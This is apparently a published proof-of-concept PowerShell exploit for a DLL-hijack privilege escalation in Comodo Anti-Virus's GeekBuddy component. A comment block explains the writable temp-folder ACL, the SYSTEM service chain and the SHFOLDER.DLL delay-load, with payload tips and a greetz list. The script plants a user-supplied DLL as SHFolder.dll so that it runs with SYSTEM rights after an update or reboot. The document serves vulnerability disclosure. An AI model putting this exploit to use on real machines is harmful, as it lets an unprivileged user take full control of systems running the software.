<#
````......````
``,;''''''''''''''''';,`
.;''''''''''''''''''''''''''',`
`:''''''''+';:,.``````.,:;'''''''''':`
,;'''''';,.```,;'''''';:
`:'''''',.`,'''''';.
`;+''+':`,;`,''''';.
`;'''';. ``.:;'` `. `;'''''.
`:+''';``,``:+'' ';;'`,'';`` ``:'''';`
.'''';` ,';' '':'`';,'`'',' :''' .''` :'''',
`;''''` ;'' :+.` ;';, ';:' ''''`,;:+ '', `;''''`
.''''. ;:`, .'.':`'''.:;`;.+;:' '::; ;''' ';.'''',
:''';` `'''',`':'' ..;:`','`'''' ':;;`'`';`':` :;:''';
;''+, .;`.'.'' ';.'`';': ,:. `` ` `,: .';',,'`;'.`';': .+'''`
`''''`;'; ''.'.,','` ,```;`''.`;'`''+: ;'''`
`''''.,.'' ,'.'' ;;. ```````` `.``'::'`;; `:'''.
``''':`+,`.':`'','`,;''''''''''+'':.`;'.+:;'``':.'''.
`''','', ''`:;`:'''''''''''''''''''''';.`;'`': ''`'` .''',
`''', ` `''``'; .''''''''''''''''''''''''''''';``.;' ;'.''`.:`''',
`''', :''.`'' `,;'''''''''''''''''''''''''''''''';. ``,.'::', ''`.'''.
''','.''`,': ,'''''''''''''''''''''''''''''''''''''', `.+,'; '';.'''`
''': ''`'' ;. `'''''''''''''''''';:::;';'''''''''''''''''.;' :': ,,`.'''
:'';`''.'`` :''''''''''''';:::.', `''';`:;'+'''','''''+;`,'; :''' ,'''
.''' `` .++; `''''''''''''`. `':''';`:''' :'''''''. .+ :''.+. :'':
`''+ :'': `` ,''''''''''''' `':'''; `: ,'''''''': .`''.'' ` '''`
;''.`+.',;;'''':''''''''; `',.'''': `:''''';'''; `'.',`,',`+''
,'':'';,'.;''''':''''''''`+`;..`;'+''.'.:''''';'''''```.+'+:'`.'';
`'''`;``+',;.`;''''':''''''''.';`;'','`'' ;''''','''''`;,+.+. ;''.
;'+.:'': ;': ;'''''':''''':',''.`'';.+''`,'; .'''';''''''``+.':``'''
`'':.+`;''` `;'''''':''''''.::''..''. ::`'';`,'''':''''''`:+'.,'',
'''`:''.:'' :''''''':'''''; :''''.'', `.,; :+'`''': ;''',''''''' ,`'''
.'':`'';``,''''''':;''''':`''';', ,''+` ,+':' +'''''''`,'''''''''''; .+`.'':
'''`''. :',`''''''':`'''''+.;';.:::::::,,''';`'': . .'''''''; ''''.''''''',`;'': '''
.'',','';`. '''''''; :'''''' `,;'''''''''.``` . ''''';:,`:;''+`'''',,'''''''`:'';``+':
'''`''.,'; ;'''''';''''',`,'''''''''''''.....,,,.`''''''''';;,,;.''''; :''''''' '''. ;''
`'': .'';:;`'''''''` .+'', ,'''''''''''';'''''''++`''''':..:'''' `''''';'''''',.,`` .'',
` :'':''`''''''+`;''``;'''''''''''''':``,,.`````,'''''. ';.;'''` `'''''''`.++. '';
+'' ,'''''': ;+`,'''''''''''''''''+''';;;;'''''''+` :;+,`''. `.'''''';.+'''` :'+`
,''.': +''''';,,;''''''''''''''''''''''''''''''''''.`.::,` `';.', ;''''''`:'':`.`'';
;'':;.;': ,''''''.`''''';;;,`.:'''''''''''''''''''''''''.;''''''':`;;;, `''''''; `.;.;'+`;''
'': `;';';' ''''''; ''';;''''''',`.'',` .:;;''''''''''.,'''''''''''.;;.,'''''' `;''''. .''`
.''..';`;'.''''''.:+;;''''''''''': ;'::::...;''+'':,'''';..``;''';.''''''; `:''.`': `'':
:'' `,'`;''''''.:;'''''''''''''';`;, `,''';` .:;;;'''':,'''''' .,''','''
;';''';,``''''''''''` :''''''''''';.:'''`';:`,''';`;''''''''''',''''''.;';,` :''`
`'', .;,''';,'''''''''' ;'''''''''':` :'''`::```'''',+''''''''''''+` ;''''';.``.:;` `''.
.''` `+;'`;`'''''''''';.'''''''',` ''';` :''';'''';::;'''''';; ` `''''''`;'';;; `+':
:'' ..;''`''''''''''`'''''''', .'''``+''';''. ,'''''''''''''''''''''''''''''''''''''':`
;'':.``.'''''''''';'''''''' ;'';;''':::` :'''''''''''''''''''''''''''''''''''''''',
;':'''':`:'''''''''''''''''',`.'''''''.`+'''''''''''''''''''''''''''''''''''''''''
'',:,;'':;''''''''''''''''''`;''...:''''` :''''''''''''''''''''''''''''''''''''''''''`
`''. `+'':,`''''''''''''''''''; ,'';.+` . ,;'''`'''''''''''''''''''''''''''''''''''''''''';
.''. `.,;'; '''''''''';''''''',''',+. `` .'.''' ''''''''+'''''''''''''''''''''''''''''''''',
.'+` ;'''''``'''''''` `;''''.'++','`+.''' '''''';`;+''''''
,''''''';; ,'''';'''';'``.''' :''''''` .'''''':
:'+'''''': .'''';'''';'` .''' ,''''''`,''''';
:'',''''', ''''''` .'''';'''';', .'''`.''''''` ''''''
;''`'''''';:''''', ''''''.'''';'''';':,''''..''''''` ''''''
;''`';''''':''''', :'''';:''''''''';''.'''''`''''''` ;'''''
;'':''''', ,''''' `+''''''''':''.'''''` ,''''';''''''
:'+,''''', `'''''.,'''''''''':''::''''; ;''''': `''''''
:''```.,''''':''''': `''''''''''',''+`'''''. `''''''. :''''''
,''` `'''''''.'''''; `''''': '''''''''''';''',,''''',''''''' ,'''''',
.''` `''':,.;`'''''' `'''''': '''''''''''''';'''`'''''':. `,''''''', .''''''''
`''``,;;;''`'''''' `'','''';,` `,''''''''''''''',''':.''''''''''''''''''':` ;'''''''''''''''''''''''''''''',
'', `+';;, '''''' `''`,'''''''''''''''''''''''''''':''''.:''''''''''''''''',+'''''''''''''''''''''''''''''';
'': ` `,.;'''''.`''' .''''''''''''''''''''''''''''.''''`;''''''''''''''':;; `''''''''''''''''''''''''''';';
;';,'''';:''''':`''''``'''''''''''''''''''''''''''`:''''`;''''''''''''';,', ,'''''''''''''''''''''''''''';
;''';;,...''''''`''';;:''''''''''''''''';'''''''. '''''`;'''''''''''';+'` ;'''''''''''''''''''''''''';.
:'' `,:;''' ''''''` `'''`';` `;'''''';,''''''';''''''', .'''''..''''''''''''+:'''''''';''''''''';''''';,`
.''. .''',` ;''''': `''':;''.````` :+'''''',;''''''','''''';..;''''''''''` `''''''`,'': `+':
'':`.;.,'''''+.'';,'''''''';:''''''''','''''''':;'''''''''.`,''''''';''''';,'',.''.
''; :+.++` `''''''. +'''`'''''''''''''''''''.''''''''', .''';;'':,,'''''''',''''''.':''',:''`
:'',';:.'.;'''''' ''''.:''''''''''''''''';;'''''''''''.'''.`:;'''''':'': :'''''' ';,.:''''
.''. .;:''' .''''''` ,'''':`''''''''''''''''':''''''''''';''''.`;'''''''''.'''', '''''': ,'''', `'':
'';;';, ;`'''''';.+''''' ''''''''''''''''':''''''''''': :'':'''''''''',;''''': :'''';' ,. .;:,''`
;'' `;', `,'''''''''''''.,'''''''''''''';','''';:.`` `,.;'''''''''''.+''''''.'''''';,'+'.'''
.''.'''';` ''''';''''''';`'''''''''''''':.'';:,;'''':`,:`:''''''''','',`:''':''''''`'.:'''`'':
''' :'': `:.,'''';;'''''''`;'''''''''''',:';`:'',,``.:'. `':`+''''''';:'',':';.'''''';`'''..':''
:''``,. ;:++`''''';,'''''';`''''''''''';;',.''....,.. ,';:.'.`'''''''.'''','';+'''''';. ,+''`'';
`'':`'',`;:`'''''',''''''.:''''''''''`+.,';:''''''';.:''':'`,''''''`'''':''''''''', :':;` ,','',
;''` `+.''+` ` :'''''','''''' '''''''''' `.'''''''''''''::'''', +'''':,''''`;''''''''+.''+;'''
`'':;'';` ` ''''''':''''';`'''''''','''''''''''''''.,''''`''''',:''''`,'''''''`'''.:';.'':
''+`,`,+:`'''''','''''':`'''''''` :'''''''''''''; ;'''`+''''`;'''':+''''''.` ` :'':;,'''
.'': ;';''. .'''''';'''''',`'''''+''''''''''''''`.,'';.''''' '''''''''''': +'``;';.'',
''+`:''; ,'`:''''','''''''.,''''' ,'''''''''''''':''''';''''','''';''''''; ,.''. .`` '''
`';;`+. ;'':':''''':'''''''.:'''; ;''''''''''''': `'''''''''''.'''''.'''''' :';`''; :''.
:'',``'':.''`;'''';;:''''''`'''; '''''''''''''': .'''''''''''.''',;'''''' ` :''.'''``'''
''' ;'.:''`;''''';:''''':''';.'';''''''''''': ,'''''''''':;'':+''''''`.''``'+',: '''`
.';;`;;'; ` :''''':'''''';'''`'';''''''''''': ,''''''''''`''';''''';.,''` :`,'':
;'',`', `'. ,''''';''''';'''''':''''''''''': .''''''''',`+';,'''';``.''';``'''
'''``'';: ` .'''':'''''`'''''';;''''''''''; `'''';'''',.`''+,'', ,'`:'''''`'''`
.''';'.''`;''''''''.''''''':'''';:,''';. ,''';''''',;'''',` `;''''''';. ;'',
,'';''.;',,';''''';,''''''`+,` .;:;''',,'';'''+.;''''',```:+,''''''''''.:'';
;'';''';', '. `,''''''.'''''' `.:;'+''''+''';.,.''':,''''''` ``'''''''''''''',''
''': .,,': :':+''''''',''';.:'+,.` `.:''':`''''''''''; `'':'''''''''''''',`
''': ` .''`'`;'''''''..,.:+,` ``.,.`,'''`;'''''''+.';'.:'''':;'''''+:.'`
''': ;:`+'`,:..,''''''; .+: `:'+''''';`;'; .''''': `:';:+''';`''''''. .':
`''';; ;'..';'`;'''',;'. .+''''''''''`;;'+:'''; .+'''''''';''''''.;,'';
`'''','; :'`'`;'''':+` `'''''''''''': ;'';'''`;''''''''''''''''',.''';
`''''` ``':. ';''.+.`''''''''''''; `'''''::'''.'''',`'''''': :';;''
''''.:;,'`:'.';','''''''''''':,'''','''..''': '''';;:,''. `''
:''':`.+'' '''',' :''''''''''+. ''''''':`'''' .''';:;`.'.:' ';
,''''``,` ',;:'. `;;;,``'''::::;''; :';, ,'''''' ;'''` +'''.''+'.:'+`':
`'''':`;'':''''''+;.;``,:`''''',`'''''`,'''' :'''.''''..''','.
:''''..,': :'''''''.`;'''';` .''''''`'''':`+'''``''',;'''``''';:'.
`'''''``.'` ''''''';`'''''''': ,''''';;'''`''''; ''';:'''. ;''',''
,'''''``.'` '''''''.'''''''''', +'''''` ,'';.''''`''''`+''' ,''''`.:
:''''', .''''''''.'''';:.,'''`''''''. .''''''':.''',;'''``;,',' '.
`:+'''';..;'''''':,''':'''.:''.'''''': `'`''''' ''''`''': ' ::.:`+
`,''''':'''''''::''+`''',;''.;''''', `'.'''';`'''.;'''`:.,+`'`,:
.;+':''''''';.''''';`,'''.''''''` `'.''''.,'''`'''.`;`+;`' +
.:+` '''''''`''''''+'''+.''''';.' ;''' ;''.;,'' ' ''.:``:
'. :'''''':.+'''''''',;''''',;: ;''; '''.'.,;,,:'' '`'
;; `'''''''``;'''''',`,'''''`'` ''',.''',.:;`' ''.,.`;
.+''''''' ` `.,,.`'; '''; :; `''+`;'';;: :.;`',`; ;`
+: `'''''``';;;;;'''', `` `+. `''' '''::;;:;`;'`;..,
,'``.. `+''''''''''+` :'`'';`''':. ,.',''.; '
`+':'''''''''''',`+.`'',.''',. :,''''+ ;
.', ;''''''''''''.':''.,''':` ;.''''.,.
:'.:''''''''''',;'`''.:''',':;.''':.:
''. ,:''''',` ;+` :'.:'''' ':`''; ;
`'', ''. ::,''''``; :, '
;+;` .'+` ``'':'`,; '``
,'';.`.'';`:';'.,;'.
`,''';:::::;'''.``+;' +`
`,:''''';,` ,,;
SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares)
Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC:
###Technical Geeky Stuff###
GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder.
These binaries are individual components of the Comodo Security Suite and are executed whenever
their related function is performed, updated, or uninstalled.
The directory listing is as follows:
10/06/2015  12:08 AM    <DIR>          .
10/06/2015  12:08 AM    <DIR>          ..
10/02/2015  10:43 PM                27 download.cfg
10/02/2015  10:47 PM           637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
10/02/2015  10:44 PM         2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
10/02/2015  10:44 PM           547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
10/06/2015  12:07 AM         1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
10/02/2015  10:44 PM           554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
10/06/2015  12:06 AM           950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
10/06/2015  12:08 AM           563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
10/02/2015  10:43 PM           768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
10/06/2015  12:08 AM           581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
10/02/2015  10:47 PM           459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
10/02/2015  10:46 PM         1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
10/06/2015  12:07 AM         1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
10/06/2015  12:07 AM           648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
10/02/2015  10:43 PM                 1 survey_version.txt
10/06/2015  12:05 AM    <DIR>          updates
The C:\ProgramData\Comodo\lps4\temp\ folder has the following permission configuration:
C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES
Notice how the special-access ACE grants BUILTIN\Users FILE_WRITE_DATA (which on a directory is the
right to create new files) together with FILE_APPEND_DATA, FILE_WRITE_EA and FILE_WRITE_ATTRIBUTES.
Combined with the plain Read ACE on existing objects and the CREATOR OWNER Full-control ACE, this lets
a non-administrator user create new files in the directory (over which the creating user then has full
control), but not delete or modify files that already exist there.
Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe, which resides
in the C:\Program Files (x86)\Common Files\COMODO\ folder. This service is auto-started via the
registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher.
This binary then launches Unit_Manager.exe from C:\Program Files\COMODO\GeekBuddy with SYSTEM-level
privileges. That binary in turn launches C:\Program Files\COMODO\GeekBuddy\unit.exe to handle each
sub-process in the C:\ProgramData\Comodo\lps4\temp\ folder.
During client connections to update servers and GeekBuddy executions, the unit.exe binary launches
setup_clps_client_transaction_release-4.19.365037.89.exe. This setup binary has a hard-coded
(delay-load) import of SHFOLDER.DLL, which the Windows loader resolves starting with the directory
the executable is run from:
.data:00409240 dd offset aShfolder ; "SHFOLDER"
.data:00409244 dd offset aShgetfolderpat ; "SHGetFolderPathA"
During this delay-load procedure the executable loads SHFOLDER.DLL from its own directory before
searching the remaining locations in the DLL search order (the Windows system directories and the
directories listed in PATH).
By planting a malicious SHFOLDER.DLL in C:\ProgramData\Comodo\lps4\temp\ and triggering an update or
client connection to the vendor's servers (which occurs automatically at user login), a local
non-administrative user can run code as SYSTEM and fully compromise the machine. Note that the planted
DLL runs its DllMain when it is loaded; since the host then resolves SHGetFolderPathA from it (see the
.data references above), a DLL that does not export that function will generally cause the delayed
import resolution to fail after DllMain has run, so the payload should execute from DllMain or the DLL
should export/forward SHGetFolderPathA if the host process needs to stay alive.
######### GREETZ ######################################################################################
First off, all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled
@taviso - keep killing it and thanks for being an inspiration
@bill_billbil - sup girl chicken rico n chill
@tacticalRCE - Its no 100 mile rides but will miss all the good times.C-ya around mang.
@hellNBak_ - drop tehm greetz like its 2003
@hacksforpancakes - make plans for other NullCon in 2016 ;)
@jduck - we gonna juke some more toyotas next time you come visit
@hdmoore - good luck with your ventures good sir
@jsoo - dont give up good sir - you're doing awesome
@thegrugq - when i grow up i hope im half as wise as you good sir
@daveaitel - Triangular Anus logos are the best
@da_667 - AYYYYYYYYYYYYYY LMAO
@bonovoxly - Clever Girls Wear Pink on Wednesdays
Derek Soeder - Respect to you brother, keep on being awesome
Benny 29A - next time im in CZ lets get beers, im buying
Yuji Ukai - #RESPECT to everything you have ever done and will ever do.#Ninja
Sizzop - for fixing my greetz
#########################################################################################################
#>
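Param
(
    # Path to the DLL to plant as SHFolder.dll. It must be loadable by the
    # target process (matching architecture; TODO confirm the bitness of
    # setup_clps_client_transaction_release-*.exe before use).
    [Parameter(ValueFromPipelineByPropertyName = $true)]
    [string]$DLL = ""
)

# Destination inside the GeekBuddy temp folder. Its ACL grants BUILTIN\Users
# FILE_WRITE_DATA (create file) but only Read on existing files, so a planted
# file can be dropped once and cannot be overwritten or removed by a non-admin
# user afterwards.
$Destination = "C:\ProgramData\Comodo\lps4\temp\SHFolder.dll"

# Test-Path raises a parameter-binding error on an empty string, which would
# hide the intended "file does not exist" message; check for that first.
# -PathType Leaf rejects a directory being passed in place of a DLL.
if ([string]::IsNullOrWhiteSpace($DLL) -or !(Test-Path -LiteralPath $DLL -PathType Leaf))
{
    throw "Fatal Error: The specified file: $DLL does not exist."
}

# -Force cannot replace an existing SHFolder.dll here for a non-admin user
# (Users have only Read on existing files), so fail early with a clear
# message instead of reporting success after a failed copy.
if (Test-Path -LiteralPath $Destination)
{
    throw "Fatal Error: $Destination already exists; the folder ACL only lets Users create new files, so an administrator must remove it first."
}

Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red

# -ErrorAction Stop turns a failed copy into a terminating error; otherwise a
# non-terminating error would let the script go on to show the success balloon.
Copy-Item -LiteralPath $DLL -Destination $Destination -Force -ErrorAction Stop

# Explicitly load both assemblies the tray notification needs
# (LoadWithPartialName is obsolete and System.Drawing was only loaded implicitly).
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing

$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon
$MyPath = Get-Process -Id $PID | Select-Object -ExpandProperty Path
$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
$objNotifyIcon.BalloonTipIcon = "Info"
$objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges"
$objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
$objNotifyIcon.Visible = $True
$objNotifyIcon.ShowBalloonTip(8000)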